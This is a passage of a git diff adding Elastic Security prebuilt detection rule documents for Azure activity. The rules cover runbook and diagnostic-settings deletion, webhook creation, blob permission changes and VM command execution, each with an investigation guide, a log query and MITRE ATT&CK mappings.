a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc new file mode 100644 index 0000000000..6789f80989 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-runbook-deleted.asciidoc @@ -0,0 +1,116 @@ +[[prebuilt-rule-8-19-8-azure-automation-runbook-deleted]] +=== Azure Automation Runbook Deleted + +Identifies when an Azure Automation runbook is deleted. An adversary may delete an Azure Automation runbook in order to disrupt their target's automated business operations or to remove a malicious runbook for defense evasion. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://azure.microsoft.com/en-in/blog/azure-automation-runbook-management/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Runbook Deleted* + + +Azure Automation Runbooks automate repetitive tasks in cloud environments, enhancing operational efficiency. Adversaries may exploit this by deleting runbooks to disrupt operations or conceal malicious activities. The detection rule monitors Azure activity logs for successful runbook deletions, signaling potential defense evasion tactics, and alerts analysts to investigate further. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by checking the operation name "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE" and ensure the event outcome is marked as Success. +- Identify the user or service principal responsible for the deletion by examining the associated user identity information in the activity logs. +- Investigate the timeline of events leading up to and following the runbook deletion to identify any suspicious activities or patterns, such as unauthorized access attempts or changes to other resources. +- Check for any recent modifications or unusual activities in the affected Azure Automation account to determine if there are other signs of compromise or tampering. +- Assess the impact of the deleted runbook on business operations and determine if any critical automation processes were disrupted. +- If applicable, review any available backup or version history of the deleted runbook to restore it and mitigate operational disruptions. + + +*False positive analysis* + + +- Routine maintenance activities by IT staff may lead to legitimate runbook deletions. To manage this, create exceptions for known maintenance periods or specific user accounts responsible for these tasks. +- Automated scripts or third-party tools that manage runbooks might trigger deletions as part of their normal operation. Identify these tools and exclude their activity from alerts by filtering based on their service accounts or IP addresses. +- Organizational policy changes or cloud environment restructuring can result in planned runbook deletions. Document these changes and adjust the detection rule to exclude these events by correlating with change management records. +- Test environments often involve frequent creation and deletion of runbooks. Exclude these environments from alerts by using tags or specific resource group identifiers associated with non-production environments. + + +*Response and remediation* + + +- Immediately isolate the affected Azure Automation account to prevent further unauthorized deletions or modifications of runbooks. +- Review the Azure activity logs to identify the user or service principal responsible for the deletion and revoke their access if unauthorized. +- Restore the deleted runbook from backups or version control if available, ensuring that the restored version is free from any malicious modifications. +- Conduct a security review of all remaining runbooks to ensure they have not been tampered with or contain malicious code. +- Implement stricter access controls and auditing for Azure Automation accounts, ensuring that only authorized personnel have the ability to delete runbooks. +- Escalate the incident to the security operations team for further investigation and to determine if additional malicious activities have occurred. +- Enhance monitoring and alerting for similar activities by integrating additional context or indicators from the MITRE ATT&CK framework related to defense evasion tactics. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and + azure.activitylogs.operation_name:"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DELETE" and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc new file mode 100644 index 0000000000..6ed3b1a76d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-automation-webhook-created.asciidoc @@ -0,0 +1,132 @@ +[[prebuilt-rule-8-19-8-azure-automation-webhook-created]] +=== Azure Automation Webhook Created + +Identifies when an Azure Automation webhook is created. Azure Automation runbooks can be configured to execute via a webhook. A webhook uses a custom URL passed to Azure Automation along with a data payload specific to the runbook. An adversary may create a webhook in order to trigger a runbook that contains malicious code. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://powerzure.readthedocs.io/en/latest/Functions/operational.html#create-backdoor +* https://github.com/hausec/PowerZure +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://www.ciraltos.com/webhooks-and-azure-automation-runbooks/ + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Configuration Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Automation Webhook Created* + + +Azure Automation webhooks enable automated task execution via HTTP requests, integrating with external systems. Adversaries may exploit this by creating webhooks to trigger runbooks with harmful scripts, maintaining persistence. The detection rule identifies webhook creation events, focusing on specific operation names and successful outcomes, to flag potential misuse in cloud environments. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal that initiated the webhook creation by examining the `event.dataset` and `azure.activitylogs.operation_name` fields. +- Check the associated runbook linked to the created webhook to determine its purpose and inspect its content for any potentially malicious scripts or commands. +- Investigate the source IP address and location from which the webhook creation request originated to identify any unusual or unauthorized access patterns. +- Verify the legitimacy of the webhook by contacting the owner of the Azure Automation account or the relevant team to confirm if the webhook creation was expected and authorized. +- Assess the broader context of the activity by reviewing recent changes or activities in the Azure Automation account to identify any other suspicious actions or configurations. + + +*False positive analysis* + + +- Routine webhook creations for legitimate automation tasks can trigger false positives. Review the context of the webhook creation, such as the associated runbook and its purpose, to determine if it aligns with expected operations. +- Frequent webhook creations by trusted users or service accounts may not indicate malicious activity. Consider creating exceptions for these users or accounts to reduce noise in alerts. +- Automated deployment processes that involve creating webhooks as part of their workflow can be mistaken for suspicious activity. Document these processes and exclude them from triggering alerts if they are verified as safe. +- Integration with third-party services that require webhook creation might generate alerts. Verify these integrations and whitelist them if they are part of approved business operations. +- Regularly review and update the list of exceptions to ensure that only verified non-threatening behaviors are excluded, maintaining the effectiveness of the detection rule. + + +*Response and remediation* + + +- Immediately disable the suspicious webhook to prevent further execution of potentially harmful runbooks. +- Review the runbook associated with the webhook for any unauthorized or malicious scripts and remove or quarantine any identified threats. +- Conduct a thorough audit of recent changes in the Azure Automation account to identify any unauthorized access or modifications. +- Revoke any compromised credentials and enforce multi-factor authentication (MFA) for all accounts with access to Azure Automation. +- Notify the security team and relevant stakeholders about the incident for further investigation and to ensure awareness of potential threats. +- Implement enhanced monitoring and alerting for webhook creation and execution activities to detect similar threats in the future. +- Document the incident, including actions taken and lessons learned, to improve response strategies and prevent recurrence. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and + azure.activitylogs.operation_name: + ( + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/ACTION" or + "MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/WEBHOOKS/WRITE" + ) and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc new file mode 100644 index 0000000000..3a645e3fc9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-container-access-level-modification.asciidoc @@ -0,0 +1,131 @@ +[[prebuilt-rule-8-19-8-azure-blob-container-access-level-modification]] +=== Azure Blob Container Access Level Modification + +Identifies changes to container access levels in Azure. Anonymous public read access to containers and blobs in Azure is a way to share data broadly, but can present a security risk if access to sensitive data is not managed judiciously. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-prevent + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Asset Visibility +* Tactic: Discovery +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Blob Container Access Level Modification* + + +Azure Blob Storage is a service for storing large amounts of unstructured data, where access levels can be configured to control data visibility. Adversaries may exploit misconfigured access levels to gain unauthorized access to sensitive data. The detection rule monitors changes in container access settings, focusing on successful modifications, to identify potential security risks associated with unauthorized access level changes. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific storage account and container where the access level modification occurred, using the operation name "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE". +- Verify the identity of the user or service principal that performed the modification by examining the associated user information in the activity logs. +- Check the timestamp of the modification to determine if it aligns with any known maintenance windows or authorized changes. +- Investigate the previous access level settings of the container to assess the potential impact of the change, especially if it involved enabling anonymous public read access. +- Correlate the event with any other recent suspicious activities or alerts in the Azure environment to identify potential patterns or coordinated actions. +- Contact the owner of the storage account or relevant stakeholders to confirm whether the change was authorized and aligns with organizational policies. + + +*False positive analysis* + + +- Routine administrative changes to container access levels by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that regularly perform these tasks. +- Automated scripts or tools used for managing storage configurations may cause false positives. Identify and exclude these scripts or tools from monitoring if they are verified as non-threatening. +- Scheduled updates or maintenance activities that involve access level modifications can be mistaken for unauthorized changes. Document and schedule these activities to align with monitoring rules, allowing for temporary exclusions during these periods. +- Changes made by trusted third-party services integrated with Azure Blob Storage might be flagged. Verify these services and exclude their operations from triggering alerts if they are deemed secure and necessary for business operations. + + +*Response and remediation* + + +- Immediately revoke public read access to the affected Azure Blob container to prevent unauthorized data exposure. +- Review the access logs to identify any unauthorized access or data exfiltration attempts during the period when the access level was modified. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized access level change and any potential data exposure. +- Conduct a thorough audit of all Azure Blob containers to ensure that access levels are configured according to the organization's security policies and that no other containers are misconfigured. +- Implement additional monitoring and alerting for changes to access levels on Azure Blob containers to ensure rapid detection of any future unauthorized modifications. +- If sensitive data was exposed, initiate a data breach response plan, including notifying affected parties and regulatory bodies as required by law. +- Review and update access management policies and procedures to prevent recurrence, ensuring that only authorized personnel can modify container access levels. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc new file mode 100644 index 0000000000..775929c5fc --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-blob-permissions-modification.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-blob-permissions-modification]] +=== Azure Blob Permissions Modification + +Identifies when the Azure role-based access control (Azure RBAC) permissions are modified for an Azure Blob. An adversary may modify the permissions on a blob to weaken their target's security controls or an administrator may inadvertently modify the permissions, which could lead to data exposure or loss. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Identity and Access Audit +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 108 + +*Rule authors*: + +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Blob Permissions Modification* + + +Azure Blob Storage is a service for storing large amounts of unstructured data. It uses Azure RBAC to manage access, ensuring only authorized users can modify or access data. Adversaries may exploit this by altering permissions to gain unauthorized access or disrupt operations. The detection rule monitors specific Azure activity logs for successful permission changes, alerting analysts to potential security breaches or misconfigurations. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the user or service principal associated with the permission modification event by examining the relevant fields such as `event.dataset` and `azure.activitylogs.operation_name`. +- Check the `event.outcome` field to confirm the success of the permission modification and gather details on the specific permissions that were altered. +- Investigate the context of the modification by reviewing recent activities of the identified user or service principal to determine if the change aligns with their typical behavior or role. +- Assess the potential impact of the permission change on the affected Azure Blob by evaluating the sensitivity of the data and the new access levels granted. +- Cross-reference the modification event with any recent security alerts or incidents to identify if this change is part of a broader attack pattern or misconfiguration issue. +- Consult with the relevant data owners or administrators to verify if the permission change was authorized and necessary, and if not, take corrective actions to revert the changes. + + +*False positive analysis* + + +- Routine administrative changes to Azure Blob permissions by authorized personnel can trigger alerts. To manage this, create exceptions for specific user accounts or roles that frequently perform legitimate permission modifications. +- Automated scripts or tools used for regular maintenance or deployment might modify permissions as part of their operation. Identify these scripts and exclude their activity from triggering alerts by using specific identifiers or tags associated with the scripts. +- Scheduled updates or policy changes that involve permission modifications can result in false positives. Document these schedules and adjust the monitoring rules to account for these timeframes, reducing unnecessary alerts. +- Integration with third-party services that require permission changes might cause alerts. Review and whitelist these services if they are verified and necessary for operations, ensuring they do not trigger false positives. + + +*Response and remediation* + + +- Immediately revoke any unauthorized permissions identified in the Azure Blob Storage to prevent further unauthorized access or data exposure. +- Conduct a thorough review of the Azure Activity Logs to identify any other suspicious activities or permission changes that may have occurred around the same time. +- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized changes and any potential data exposure. +- Implement additional monitoring on the affected Azure Blob Storage accounts to detect any further unauthorized access attempts or permission modifications. +- Escalate the incident to the incident response team if there is evidence of a broader security breach or if sensitive data has been compromised. +- Review and update Azure RBAC policies to ensure that only necessary permissions are granted, and consider implementing more granular access controls to minimize the risk of future unauthorized modifications. +- Conduct a post-incident analysis to identify the root cause of the permission change and implement measures to prevent similar incidents in the future, such as enhancing logging and alerting capabilities. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:( + "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MANAGEOWNERSHIP/ACTION" or + "MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/BLOBS/MODIFYPERMISSIONS/ACTION") and + event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc new file mode 100644 index 0000000000..5509b4c4ce --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine.asciidoc @@ -0,0 +1,118 @@ +[[prebuilt-rule-8-19-8-azure-command-execution-on-virtual-machine]] +=== Azure Command Execution on Virtual Machine + +Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machine Contributor role lets you manage virtual machines, but not access them, nor access the virtual network or storage account they’re connected to. However, commands can be run via PowerShell on the VM, which execute as System. Other roles, such as certain Administrator roles may be able to execute commands on a VM as well. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://adsecurity.org/?p=4277 +* https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a +* https://docs.microsoft.com/en-us/azure/role-based-access-control/built-in-roles#virtual-machine-contributor + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Use Case: Log Auditing +* Tactic: Execution +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Command Execution on Virtual Machine* + + +Azure Virtual Machines (VMs) allow users to run applications and services in the cloud. While roles like Virtual Machine Contributor can manage VMs, they typically can't access them directly. However, commands can be executed remotely via PowerShell, running as System. Adversaries may exploit this to execute unauthorized commands. The detection rule monitors Azure activity logs for command execution events, flagging successful operations to identify potential misuse. + + +*Possible investigation steps* + + +- Review the Azure activity logs to identify the specific user or service principal that initiated the command execution event, focusing on the operation_name "MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION". +- Check the event.outcome field to confirm the success of the command execution and gather details about the command executed. +- Investigate the role and permissions of the user or service principal involved to determine if they have legitimate reasons to execute commands on the VM. +- Analyze the context of the command execution, including the time and frequency of the events, to identify any unusual patterns or anomalies. +- Correlate the command execution event with other logs or alerts from the same time period to identify any related suspicious activities or potential lateral movement. +- If unauthorized access is suspected, review the VM's security settings and access controls to identify and mitigate any vulnerabilities or misconfigurations. + + +*False positive analysis* + + +- Routine maintenance tasks executed by IT administrators can trigger the rule. To manage this, create exceptions for known maintenance scripts or scheduled tasks that are regularly executed. +- Automated deployment processes that use PowerShell scripts to configure or update VMs may be flagged. Identify these processes and exclude them from the rule to prevent unnecessary alerts. +- Security tools or monitoring solutions that perform regular checks on VMs might execute commands that are benign. Whitelist these tools by identifying their specific command patterns and excluding them from detection. +- Development and testing environments often involve frequent command executions for testing purposes. Consider excluding these environments from the rule or setting up a separate monitoring policy with adjusted thresholds. +- Ensure that any exclusion or exception is documented and reviewed periodically to maintain security posture and adapt to any changes in the environment or processes. + + +*Response and remediation* + + +- Immediately isolate the affected virtual machine from the network to prevent further unauthorized command execution and potential lateral movement. +- Review the Azure activity logs to identify the source of the command execution and determine if it was authorized or part of a larger attack pattern. +- Revoke any unnecessary permissions from users or roles that have the ability to execute commands on virtual machines, focusing on those with Virtual Machine Contributor roles. +- Conduct a thorough investigation of the executed commands to assess any changes or impacts on the system, and restore the VM to a known good state if necessary. +- Implement additional monitoring and alerting for similar command execution activities, ensuring that any future unauthorized attempts are detected promptly. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems or data may have been compromised. +- Review and update access control policies and role assignments to ensure that only necessary permissions are granted, reducing the risk of similar incidents in the future. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.COMPUTE/VIRTUALMACHINES/RUNCOMMAND/ACTION" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Cloud Administration Command +** ID: T1651 +** Reference URL: https://attack.mitre.org/techniques/T1651/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc new file mode 100644 index 0000000000..970bf32489 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-8-azure-diagnostic-settings-deletion]] +=== Azure Diagnostic Settings Deletion + +Identifies the deletion of diagnostic settings in Azure, which send platform logs and metrics to different destinations. An adversary may delete diagnostic settings in an attempt to evade defenses. + +*Rule type*: query + +*Rule indices*: + +* logs-azure.activitylogs-* +* filebeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/azure/azure-monitor/platform/diagnostic-settings + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Azure Diagnostic Settings Deletion* + + +Azure Diagnostic Settings are crucial for monitoring and logging platform activities, sending data to various destinations for analysis. Adversaries may delete these settings to hinder detection and analysis of their activities, effectively evading defenses. The detection rule identifies such deletions by monitoring specific Azure activity logs for successful deletion operations, flagging potential defense evasion attempts. + + +*Possible investigation steps* + + +- Review the Azure activity logs to confirm the deletion event by filtering for the operation name "MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE" and ensuring the event outcome is marked as Success. +- Identify the user or service principal responsible for the deletion by examining the associated user identity or service principal ID in the activity logs. +- Check the timestamp of the deletion event to determine when the diagnostic settings were removed and correlate this with other security events or alerts around the same time. +- Investigate the affected resources by identifying which diagnostic settings were deleted and assess the potential impact on monitoring and logging capabilities. +- Review any recent changes or activities performed by the identified user or service principal to determine if there are other suspicious actions that might indicate malicious intent. +- Assess the current security posture by ensuring that diagnostic settings are reconfigured and that logging and monitoring are restored to maintain visibility into platform activities. + + +*False positive analysis* + + +- Routine maintenance activities by authorized personnel may trigger the rule. Ensure that maintenance schedules are documented and align with the detected events. +- Automated scripts or tools used for managing Azure resources might delete diagnostic settings as part of their operation. Review and whitelist these scripts if they are verified as non-threatening. +- Changes in organizational policy or compliance requirements could lead to legitimate deletions. Confirm with relevant teams if such policy changes are in effect. +- Test environments often undergo frequent configuration changes, including the deletion of diagnostic settings. Consider excluding these environments from the rule or adjusting the rule to account for their unique behavior. +- Ensure that any third-party integrations or services with access to Azure resources are reviewed, as they might inadvertently delete diagnostic settings during their operations. + + +*Response and remediation* + + +- Immediately isolate affected Azure resources to prevent further unauthorized changes or deletions. This may involve temporarily restricting access to the affected subscriptions or resource groups. +- Review the Azure activity logs to identify the source of the deletion request, including the user account and IP address involved. This will help determine if the action was authorized or malicious. +- Recreate the deleted diagnostic settings as soon as possible to restore logging and monitoring capabilities. Ensure that logs are being sent to secure and appropriate destinations. +- Conduct a thorough investigation of the user account involved in the deletion. If the account is compromised, reset credentials, and review permissions to ensure they are appropriate and follow the principle of least privilege. +- Escalate the incident to the security operations team for further analysis and to determine if additional resources or expertise are needed to address the threat. +- Implement additional monitoring and alerting for similar deletion activities to ensure rapid detection and response to future attempts. +- Review and update access controls and policies related to diagnostic settings to prevent unauthorized deletions, ensuring that only trusted and necessary personnel have the ability to modify these settings. + +==== Setup + + +The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOFT.INSIGHTS/DIAGNOSTICSETTINGS/DELETE" and event.outcome:(Success or success) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc new file mode 100644 index 0000000000..6d02cadcb5 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication.asciidoc @@ -0,0 +1,169 @@ +[[prebuilt-rule-8-19-8-azure-entra-id-rare-app-id-for-principal-authentication]] +=== Azure Entra ID Rare App ID for Principal Authentication + +Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen credentials may specify an Azure-managed app ID to authenticate on-behalf-of a user. This is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The app ID specified may not be commonly used by the user based on their historical sign-in activity. + +*Rule type*: new_terms + +*Rule indices*: + +* filebeat-* +* logs-azure.signinlogs-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf + +*Tags*: + +* Domain: Cloud +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Tactic: Initial Access +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Azure Entra ID Rare App ID for Principal Authentication* + + +This rule identifies rare Azure Entra apps IDs requesting authentication on-behalf-of a principal user. An adversary with stolen 